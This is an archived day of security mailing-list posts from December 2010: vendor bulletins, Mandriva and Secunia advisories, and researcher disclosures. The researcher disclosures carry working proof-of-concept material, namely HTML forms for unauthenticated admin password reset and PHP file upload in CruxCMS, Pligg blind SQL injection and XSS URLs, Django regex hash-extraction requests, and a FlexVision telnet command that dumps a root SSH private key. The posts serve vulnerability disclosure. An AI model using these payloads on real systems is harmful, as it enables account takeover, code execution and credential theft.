Sigma Portal Denial of Service Vulnerability

2010-12-27 Thread info
# 
# Securitylab.ir
# 
# Application Info:
# Name: Sigma Portal
# Vendor: http://www.sigma.ir
# 
# Vulnerability Info:
# Type: Denial of Service
# Risk: Medium
# 2010-08-11 - Vendor notified
#
Vulnerability: 
http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%2791Height=1099000-=ObjectType=NewsObjectID=(Picture
 ID)

With setting of large values of width and height it's possible to create
large load at the server.
# 
# Discoverd By: Pouya Daneshmand
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir  whh_iran[at]yahoo.com
###


[security bulletin] HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code

2010-12-27 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02660122
Version: 2

HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote 
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-12-20
Last Updated: 2010-12-22

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StorageWorks 
Storage Mirroring. This vulnerability could be exploited remotely to execute 
arbitrary code.

References: CVE-2010-4116, ZDI-CAN-958

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StorageWorks Storage Mirroring v5 prior to v5.2.2.1771.2

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2010-4116(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Abdul Aziz Hariri of ThirdEyeTesters along 
with TippingPoint's Zero Day Initiative for reporting this vulnerability to 
security-al...@hp.com.

RESOLUTION

HP has provided HP StorageWorks Storage Mirroring v5.2.2.1771.2 to resolve the 
vulnerability.

Customers can receive HP StorageWorks Storage Mirroring v5.2.2.1771.2 or 
subsequent by contacting the normal HP Services support channel.

HISTORY
Version:1 (rev.1) - 20 December 2010 Initial release
Version:2 (rev.2) - 20 December 2010 Added TippingPoint to the acknowledgement 
in the Background section

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 

Secunia Research: Microsoft Word LFO Parsing Double-Free Vulnerability

2010-12-27 Thread Secunia Research
== 

 Secunia Research 23/12/2010

- Microsoft Word LFO Parsing Double-Free Vulnerability -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* Microsoft Word 2002 (10.6856.6858) SP3

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Office Word ... provides editing and reviewing tools that help you
create professional documents more easily than ever before.

Product Link:
http://office.microsoft.com/en-us/word/default.aspx

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Word, 
which can be exploited by malicious people to potentially compromise 
a user's system.

The vulnerability is caused by a double-free error when processing LFO
(List Format Override) records and can be exploited to corrupt memory 
via a specially crafted Word document.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-079.

== 
6) Time Table 

25/05/2010 - Vendor notified.
25/05/2010 - Vendor response.
22/12/2010 - Vendor informs that due to a mishap the vulnerability
 report fell off their radar. The vulnerability has in the 
 meantime been fixed by MS10-079, which will be updated 
 accordingly with proper credits.
23/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-3217 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-76/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Asan Portal (IdehPardaz) Multiple Vulnerabilities

2010-12-27 Thread info
#

# Securitylab.ir

#

# Application Info:

# Name: Asan Portal

# Vendor: http://iptech.ir/default.aspx?id=130

#

Vulnerability:



##

# Denial of Service:

##

http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922FieldName=Content_Image1w=1000h=1000

With setting of large values of width and height it's possible to create large 
load at the server.



##

# SQL Injection:

##

http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1h=75id=%24[SQL
 Injection]w=75



#

# Discoverd By: Securitylab.ir

# Website: http://Securitylab.ir

# Contacts: info[at]securitylab.ir

###


[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0

2010-12-27 Thread come2waraxe
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
===

Author: Janek Vind waraxe
Date: 27. December 2010
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-78.html


Affected Software:
~~~

CruxCMS is a lightweight, easy to use website content management system (CMS).
It is written in PHP and uses the powerful MySQL database.

http://www.cruxsoftware.co.uk/cruxcms.php


Affected versions
~~~

Tests were conducted against CruxCMS version 3.0.0

###
1. Unauthorized password reset in manager/passwordreset.php
###

Reason: directly accessible php script
Attack vectors: user submitted POST parameters ID and Password
Preconditions: none
Impact: attacker can take over CruxCMS admin account

Php script manager/passwordreset.php is directly accessible via web
without any authorization. Source code snippet:

-[ source code start ]-
include (../includes/injectionprevention.php);

$ID = numericquery($_POST[ID]) ;

if (isset($ID)) {

$Password = preventinjection($_POST[Password]);
$Password2 = md5($Password);

//Connect to database
include (../includes/dbinfo.php);

// Insert data
$sqlquery = UPDATE   . usersdb .   SET 
.Password =' .$Password2 .' WHERE ID =' .$ID .';

$results = mysql_query($sqlquery);
-[ source code end ]---

Example exploit:
---
html
headtitleCruxCMS 3.0.0 Unauthorized Password Reset PoC by 
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/passwordreset.php; 
method=post
input type=hidden name=ID value=1
input type=hidden name=Password value=waraxe
input type=submit value=Test!
/form
/center/body/html
---


###
2. Arbitrary file upload in manager/processeditor.php
###

Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none
Impact: attacker is able to write remote php files to any location.

Php script manager/processeditor.php is directly accessible via web
without any authorization. Source code snippet:

-[ source code start ]-
$Name = preventinjection($_POST[name]) ;
if (isset($_POST['Type'])) {
$Type = $_POST['Type'];
}

..

$head = $_POST[head] ;
$headlink = $Name . .php;

if ($Type == Add) {

..

$fileopen = fopen($headlink, 'w') or die(can't open file);
fwrite($fileopen, $head);
fclose($fileopen);
-[ source code end ]---

Example exploit:
---
html
headtitleCruxCMS 3.0.0 processeditor.php File Upload PoC by 
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/processeditor.php; 
method=post
input type=hidden name=Type value=Add
input type=hidden name=name value=../images/info
input type=hidden name=head value=?phpinfo();?
input type=submit value=Test!
/form
/center/body/html
---
For testing first make sure, that images directory is writable by php.
Open html file above and click Test! button. After successful POST request
newly written remote file can be accessed like this:

http://localhost/cruxcms.3.0.0/images/info.php


###
3. Arbitrary file upload in manager/processfile.php
###

Reason: directly accessible php script
Attack vector: specially crafted POST request
Preconditions: none

Example exploit:
---
html
headtitleCruxCMS 3.0.0 processfile.php File Upload PoC by 
waraxe/title/head
bodycenter
form action=http://localhost/cruxcms.3.0.0/manager/processfile.php;
enctype=multipart/form-data method=postmethod=post
input type=hidden name=Action value=Add
input type=file name=uploadedfile size=40
input type=submit value=Test!
/form
/center/body/html
---
For testing first make sure, that Uploads/Misc/ directory is writable by php.
Open html file above and click Test! button. After successful POST request
newly written remote file can be accessed like this:


[ MDVSA-2010:251-2 ] firefox

2010-12-27 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2010:251-2
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: December 24, 2010
 Affected: 2010.0
 ___

 Problem Description:

 Security issues were identified and fixed in firefox:
 
 Security researchers Yosuke Hasegawa and Masatoshi Kimura reported that
 the x-mac-arabic, x-mac-farsi and x-mac-hebrew character encodings are
 vulnerable to XSS attacks due to some characters being converted to
 angle brackets when displayed by the rendering engine. Sites using
 these character encodings would thus be potentially vulnerable to
 script injection attacks if their script filtering code fails to
 strip out these specific characters (CVE-2010-3770).
 
 Google security researcher Michal Zalewski reported that when a
 window was opened to a site resulting in a network or certificate
 error page, the opening site could access the document inside the
 opened window and inject arbitrary content. An attacker could use
 this bug to spoof the location bar and trick a user into thinking
 they were on a different site than they actually were (CVE-2010-3774).
 
 Mozilla security researcher moz_bug_r_a4 reported that the fix for
 CVE-2010-0179 could be circumvented permitting the execution of
 arbitrary JavaScript with chrome privileges (CVE-2010-3773).
 
 Security researcher regenrecht reported via TippingPoint's Zero
 Day Initiative that JavaScript arrays were vulnerable to an integer
 overflow vulnerability. The report demonstrated that an array could
 be constructed containing a very large number of items such that when
 memory was allocated to store the array items, the integer value used
 to calculate the buffer size would overflow resulting in too small a
 buffer being allocated. Subsequent use of the array object could then
 result in data being written past the end of the buffer and causing
 memory corruption (CVE-2010-3767).
 
 Security researcher regenrecht reported via TippingPoint's Zero Day
 Initiative that a nsDOMAttribute node can be modified without informing
 the iterator object responsible for various DOM traversals. This
 flaw could lead to a inconsistent state where the iterator points
 to an object it believes is part of the DOM but actually points to
 some other object. If such an object had been deleted and its memory
 reclaimed by the system, then the iterator could be used to call into
 attacker-controlled memory (CVE-2010-3766).
 
 Security researcher Gregory Fleischer reported that when a Java
 LiveConnect script was loaded via a data: URL which redirects via a
 meta refresh, then the resulting plugin object was created with the
 wrong security principal and thus received elevated privileges such
 as the abilities to read local files, launch processes, and create
 network connections (CVE-2010-3775).
 
 Mozilla added the OTS font sanitizing library to prevent downloadable
 fonts from exposing vulnerabilities in the underlying OS font
 code. This library mitigates against several issues independently
 reported by Red Hat Security Response Team member Marc Schoenefeld
 and Mozilla security researcher Christoph Diehl (CVE-2010-3768).
 
 Security researcher wushi of team509 reported that when a XUL
 tree had an HTML \div\ element nested inside a \treechildren\
 element then code attempting to display content in the XUL tree would
 incorrectly treat the \div\ element as a parent node to tree content
 underneath it resulting in incorrect indexes being calculated for the
 child content. These incorrect indexes were used in subsequent array
 operations which resulted in writing data past the end of an allocated
 buffer. An attacker could use this issue to crash a victim's browser
 and run arbitrary code on their machine (CVE-2010-3772).
 
 Security researcher echo reported that a web page could open a window
 with an about:blank location and then inject an \isindex\ element
 into that page which upon submission would redirect to a chrome:
 document. The effect of this defect was that the original page would
 wind up with a reference to a chrome-privileged object, the opened
 window, which could be leveraged for privilege escalation attacks
 (CVE-2010-3771).
 
 Dirk Heinrich reported that on Windows platforms when document.write()
 was called with a very long string a buffer overflow was caused in line
 breaking routines attempting to process the string for display. Such
 cases triggered an invalid read past the end of an array causing a
 crash which an attacker could potentially use to run arbitrary code
 on a victim's computer (CVE-2010-3769).
 
 Mozilla developers identified and fixed several memory safety
 bugs in the browser engine used in Firefox and other 

Django admin list filter data extraction / leakage

2010-12-27 Thread Adam Baldwin
ADVISORY INFORMATION:
Advisory ID: NGENUITY-2010-009
Date discovered: 8.28.2010
Date published: 12.22.2010

SOFTWARE AFFECTED:
“Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.” [1]
The admin interface of the Django web framework can be abused to extract
information, such as user password hashes via list filters. Version
1.1.2, 1.2.3 and before are affected. The advisory from the Django dev
team can be found here [2].

TECHNICAL DETAILS:
The principle behind the vulnerability is similar to blind sql
injection, but abuses a feature of t We can use list filters to follow
foreign keys into models and data our user should not normally have
access to. Using regular expressions gives us a lot of flexibility to
work our way down the value we want to extract.

For a model that has a created_by field that points to a User object we
could extract the password hash using a request similar to the below.
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[0-9]$
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[a-f]$


Authentication as a staff user in the admin is required to exploit this
vulnerability. Here's looking at you CMS apps!

CREDIT:
This vulnerability was discovered by Adam Baldwin
mailto:adam_bald...@ngenuity-is.commailto:adam_bald...@ngenuity-is.com
REFERENCES:
[1] - http://www.djangoproject.com
[2] - http://www.djangoproject.com/weblog/2010/dec/22/security/
[3] -
http://ngenuity-is.com/advisories/2010/dec/22/information-leakage-in-django-administrative-inter/
[4] -
http://evilpacket.net/2010/dec/22/information-leakage-django-administrative-interfac/




[ MDVSA-2010:259 ] pidgin

2010-12-27 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:259
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: December 23, 2010
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 A null pointer dereference due to receiving a short packet for a direct
 connection in the MSN code could potentially cause a denial of service.
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 This update provides pidgin 2.7.8 that has been patched to address
 this flaw.
 ___

 References:

 http://pidgin.im/news/security/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 c268cfea5df24d94a1fce4ed9e9c8e2b  2009.0/i586/finch-2.7.8-0.2mdv2009.0.i586.rpm
 1b83a79a24630273cb0fd6de36063d01  
2009.0/i586/libfinch0-2.7.8-0.2mdv2009.0.i586.rpm
 5ac73ba5e6b8f422fdd2dc8216112072  
2009.0/i586/libpurple0-2.7.8-0.2mdv2009.0.i586.rpm
 297f0cdd8b87c5cd4909c3c6fbe1ac31  
2009.0/i586/libpurple-devel-2.7.8-0.2mdv2009.0.i586.rpm
 e57619f18b1e859ee22631c2f393be6b  
2009.0/i586/pidgin-2.7.8-0.2mdv2009.0.i586.rpm
 0b317674aa0aa78c7b2601ebd66ef886  
2009.0/i586/pidgin-bonjour-2.7.8-0.2mdv2009.0.i586.rpm
 e2e068ed1acc961c256fb5fb3a6bc4a7  
2009.0/i586/pidgin-client-2.7.8-0.2mdv2009.0.i586.rpm
 409b5693a3d350d54a6b1b07dcfe4e88  
2009.0/i586/pidgin-gevolution-2.7.8-0.2mdv2009.0.i586.rpm
 64d503c98a0048ecae1f6959e1902c7b  
2009.0/i586/pidgin-i18n-2.7.8-0.2mdv2009.0.i586.rpm
 2fd2ea0ba84497c5dd778b8a4996a446  
2009.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2009.0.i586.rpm
 195a0fca668c2cb8b049aa2f878d6b99  
2009.0/i586/pidgin-perl-2.7.8-0.2mdv2009.0.i586.rpm
 eab1d0f42237cb2de2bf0dcdb60c01f5  
2009.0/i586/pidgin-plugins-2.7.8-0.2mdv2009.0.i586.rpm
 df33bb5b86bd903aa82e31b3ae2c7405  
2009.0/i586/pidgin-silc-2.7.8-0.2mdv2009.0.i586.rpm
 356ff080f65bc0e6dbff9f3292ab35ed  
2009.0/i586/pidgin-tcl-2.7.8-0.2mdv2009.0.i586.rpm 
 6fe3a267b0c994c98252defc0229d73f  
2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 07cbd9d2d40cb069ea315cb55dc1d5b9  
2009.0/x86_64/finch-2.7.8-0.2mdv2009.0.x86_64.rpm
 2759f7a76653f15d33e23828041e775d  
2009.0/x86_64/lib64finch0-2.7.8-0.2mdv2009.0.x86_64.rpm
 f120e2602535fdd5736a3f0051d97648  
2009.0/x86_64/lib64purple0-2.7.8-0.2mdv2009.0.x86_64.rpm
 c477958fdb03426af9cd29a7da91373d  
2009.0/x86_64/lib64purple-devel-2.7.8-0.2mdv2009.0.x86_64.rpm
 e7d575b135dc40ffe447e85958e89f0f  
2009.0/x86_64/pidgin-2.7.8-0.2mdv2009.0.x86_64.rpm
 0ba47012d00f1682c00fd9b87072129e  
2009.0/x86_64/pidgin-bonjour-2.7.8-0.2mdv2009.0.x86_64.rpm
 55eeaf467e82d003abf5de61b65f5ae0  
2009.0/x86_64/pidgin-client-2.7.8-0.2mdv2009.0.x86_64.rpm
 4478c7c5301da7fcb78c989eb18d9497  
2009.0/x86_64/pidgin-gevolution-2.7.8-0.2mdv2009.0.x86_64.rpm
 448777d63afc82270d18b2a99fa5294a  
2009.0/x86_64/pidgin-i18n-2.7.8-0.2mdv2009.0.x86_64.rpm
 51080c450cb241977de0a5c94564c368  
2009.0/x86_64/pidgin-meanwhile-2.7.8-0.2mdv2009.0.x86_64.rpm
 7e8cb3ebcd3b71134ee00761766d6407  
2009.0/x86_64/pidgin-perl-2.7.8-0.2mdv2009.0.x86_64.rpm
 2f06b7d807934fdb4a3ada32e7e1dcc7  
2009.0/x86_64/pidgin-plugins-2.7.8-0.2mdv2009.0.x86_64.rpm
 123067587dab1f25871be80313bba3c5  
2009.0/x86_64/pidgin-silc-2.7.8-0.2mdv2009.0.x86_64.rpm
 d7d55cb2e4ca769ea94a3a44690bc7d1  
2009.0/x86_64/pidgin-tcl-2.7.8-0.2mdv2009.0.x86_64.rpm 
 6fe3a267b0c994c98252defc0229d73f  
2009.0/SRPMS/pidgin-2.7.8-0.2mdv2009.0.src.rpm

 Mandriva Linux 2010.0:
 9c7d51a088df133d4caa4b8059ba821a  2010.0/i586/finch-2.7.8-0.2mdv2010.0.i586.rpm
 8dedd9ee7739e0ed384df88f63501412  
2010.0/i586/libfinch0-2.7.8-0.2mdv2010.0.i586.rpm
 f67e74064a653bb9a2812eb78a307cff  
2010.0/i586/libpurple0-2.7.8-0.2mdv2010.0.i586.rpm
 3483a4e99e028e5b09ea0165b176c037  
2010.0/i586/libpurple-devel-2.7.8-0.2mdv2010.0.i586.rpm
 5117c80ad19c56b39280f7c3dfdd1872  
2010.0/i586/pidgin-2.7.8-0.2mdv2010.0.i586.rpm
 dc33975bc058eb24168e029967889c5b  
2010.0/i586/pidgin-bonjour-2.7.8-0.2mdv2010.0.i586.rpm
 b9104754d162f03f083da877997c9150  
2010.0/i586/pidgin-client-2.7.8-0.2mdv2010.0.i586.rpm
 1013da7e359b8cc576ebea1aebbfcce6  
2010.0/i586/pidgin-i18n-2.7.8-0.2mdv2010.0.i586.rpm
 a686ada4efeea86b8bff3b1a861084f3  
2010.0/i586/pidgin-meanwhile-2.7.8-0.2mdv2010.0.i586.rpm
 361dc60eeeabf18fe147aa636c94c04f  
2010.0/i586/pidgin-perl-2.7.8-0.2mdv2010.0.i586.rpm
 a001335057f3aebd6733378469d58871  
2010.0/i586/pidgin-plugins-2.7.8-0.2mdv2010.0.i586.rpm
 0cdc172b5dc0b62f0468c4ed00a4141d  
2010.0/i586/pidgin-silc-2.7.8-0.2mdv2010.0.i586.rpm
 6d09b87891d3b38b4b7a70a6a69261d2  

Re: [IMF 2011] 2nd Call - Deadline Extended - Addenunm

2010-12-27 Thread Oliver Goebel

Addenum:

Merry Christmas to everyone!

Ollie
-- 
Oliver Goebelmailto:goe...@cert.uni-stuttgart.de
Stabsstelle DV-Sicherheit (RUS-CERT) Tel:+49 711 685 1 CERT
Universitaet Stuttgart   Tel:+49 711 685 8-3678 / Fax:-3688
Breitscheidstr. 2, 70174 Stuttgart   http://CERT.Uni-Stuttgart.DE/



Pligg XSS and SQL Injection

2010-12-27 Thread mike
Credit: Michael Brooks
Bug Fix in 1.1.2:
http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1status=
'and+sleep(9)or+sleep(9)or+1%3D' search=onadvancesearch= Search
+sgroup=onstags=0slink=onscategory=onscomments=0suser=0

XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search=; onclick=alert(1) a=


The onclick event can be used as reflective xss on /register.php using the 
following post variables:
reg_username
reg_email
reg_password
reg_password2


[IMF 2011] 2nd Call - Deadline Extended

2010-12-27 Thread Oliver Goebel
Dear all,

the deadline for the submission of papers to IMF 2011 has been extended.

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.

Please excuse possible cross-postings.



CALL FOR PAPERS

   IMF 2011

  6th International Conference
   on IT Security Incident Management  IT Forensics

 May 10th - 12th, 2011
  Stuttgart, Germany

  DEADLINE EXTENSION!



PAPER SUBMISSION

The deadline for paper submissions has been extended to January 17th,
2011.  Notification of acceptance will be sent on January 31st.
Camera ready paper copies must be submitted until Febuary 7th, 2011.

Papers can be submitted via the page found at:
http://www.imf-conference.org/imf2011/submission.html

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.



Conference Background
-
IT-Security has become a steady concern for all entities operating
IT-Systems. These include enterprises, governmental and non-governmental
organizations, as well as individuals.  Yet, despite high-end
precautionary measures taken, not every attack or security mishap can be
prevented and hence incidents will go on happening.  In such cases
forensic capabilities in investigating incidents in both technical and
legal aspects are vital to understand their issue and feed back the
knowledge gained into the security process.  Documenting the measures
taken to prevent or minimize damage to own or external IT infrastructure
provides legal rear cover if an involved party decides to start
proceedings. In a possible lawsuit emerging from such an incident, its
treatment in a forensically proper way is crucial to be able to possibly
claim for damages or prevent from being threatened by claims of third
parties.  Thus, capable incident response and forensic procedures have
become an essential part of IT infrastructure operations.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life.  IT systems produce traces and
evidence in many ways that play a more and more relevant role in
resolving cases.


Conference Goals

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry (both as users and solution providers), academia,
law-enforcement and other government bodies.


Conference Topics
--
The scope of IMF 2011 is broad and includes, but is not limited to the
following areas:

IT Security Incident Response

- Procedures and Methods of Incident Response
- Formats and Standardization for Incident Response
- Tools Supporting Incident Response
- Incident Analysis
- CERTs/CSIRTs
- Sources of Information, Information Exchange, Communities
- Dealing with Vulnerabilities (Vulnerability Response)
- Monitoring and Early Warning
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable  Laws
  and Regulations)

IT Forensics

- Trends and Challenges in IT Forensics
- Application of forensic techniques in new areas
- Techniques, Tools in Procedures IT Forensics
 -Methods for the Gathering, Handling, Processing and Analysis of
  Digital Evidence
- Evidence Protection in IT Environments
- Standardization in IT Forensics
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and
  Regulations)


Submission Details
--
IMF invites to submit full papers, presenting novel and mature research
results as well as practice papers, describing best practices, case
studies or lessons learned of up to 20 pages.  Proposals for workshops,
discussions and presentations on practical methods and challenges are
also welcome.

All submissions must be written in English (see below), and either in
postscript or PDF format.  Authors of accepted papers must ensure that
their papers will be presented at the conference.
Submitted full papers must not substantially overlap papers that have
been published elsewhere or that are simultaneously submitted to a
journal or a conference with proceedings.

All submissions will be reviewed by the program committee and papers
accepted to be presented at the conference will be included in the
conference proceedings.

Details on the electronic submission procedure as well 

Security Advisory - FlexVision Listener Vulnerability

2010-12-27 Thread Victor Ribeiro Hora
=[ Tempest Security Intelligence - Advisory #02 / 2010 ]=
 
   Information Disclosure Vulnerability in FlexVision Agent Listener
   -
 
 
  Authors: Victor Ribeiro Hora victor *SPAM* tempest.com.br
http://tempest.com.br
   Tempest Security Intelligence - Brazil
 
 
=[ Table of Contents ]=
 
 1. Overview
 2. Detailed description
 3. Additional context  Solutions
 4. References
 5. Thanks
 
 
=[ Overview ]==
 
 * System affected: FlexVision Agent Listener 1.3 for Windows, Linux and
Solaris
   (other versions may be vulnerable)
 
 * Release date: 22 October 2010
 
 * Impact: Successful exploitation of this vulnerability may lead to
remote server sensitive information disclosure.
 
FlexVision [1] claims to be an IT service focused on hardware and
software management, offering features like capacity planning, SLA
monitoring and systems inventory. The service is used by several major
companies in Brazil, including banking, telecom, energy, health and
independent product sectors.
 
The vulnerability was found in the inventory agent listener or fval.
Exploitation of this weakness does not require any authentication and
may lead to remote disclosure of sensitive information from the server
running the agent.
 
Specifically, an attacker can download non-binary files, and list
running services, running processes and installed software. It seems
there is some active filtering for known sensitive data, but other
sensitive information may leak.
 
=[ Detailed description ]
 
FlexVision Inventory service has several agents (servers) to collect
data from different platforms and send them to a central console on the
network. These agents are installed on the hardware to be monitored and
listen for incoming client connections.
 
One of the agents that was analyzed is the FlexVision Actions Listener
1.3 for Linux, used for the inventory of Linux systems. This agent is
executed by a Linux binary called fval started at boot time through an
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a
chdir() to /opt/flex/plugins, then it opens a socket listening for
connections on port 3810/TCP in daemon mode.
 
As soon as the TCP Three-Way Handshake is completed, the agent keeps
waiting for commands to perform the various inventory functions. These
commands are interpreted as internal functions of the fval binary, such
as help, version, exit or run. 
 
Specifically, the run function expects a parameter. We noted that this
parameter is a bash script file in the /opt/flex/plugins directory. This
script is executed by the fval binary, and the output of the script is
returned on the same TCP connection to the central console application.
These commands are normally sent from a central console to the monitored
agent.
 
 As the connection is not authenticated nor encrypted in any way, it
gives the possibility of any computer that has access to the 3810/TCP
port of any agent, sending commands to be executed by the agent.
 
In spite of the fact that the agent uses an active filter for some well
known sensitive data (like password hashes in the shadow file, for
example), it is possible to get other not easily predictable but
sensitive data. Some special chars we tested were also filtered, such as
'*',  ';',  '' , and also white spaces, tabs and other special
delimiters used on bash and other shells.


The following is an example of the recovery of a private SSH RSA key
file that belongs to the root user on a Linux server:
 
---
 
v...@victim01:~$ telnet 192.168.1.1 3810
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
FVALrun symonfile.sh /root/.ssh id_rsa
-BEGIN RSA PRIVATE KEY-
MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG
eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz
Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ
9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o
z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe
3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8
xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO
s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW
XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV
 
---
 
Just like Linux fval, on Windows it's also possible to dump any
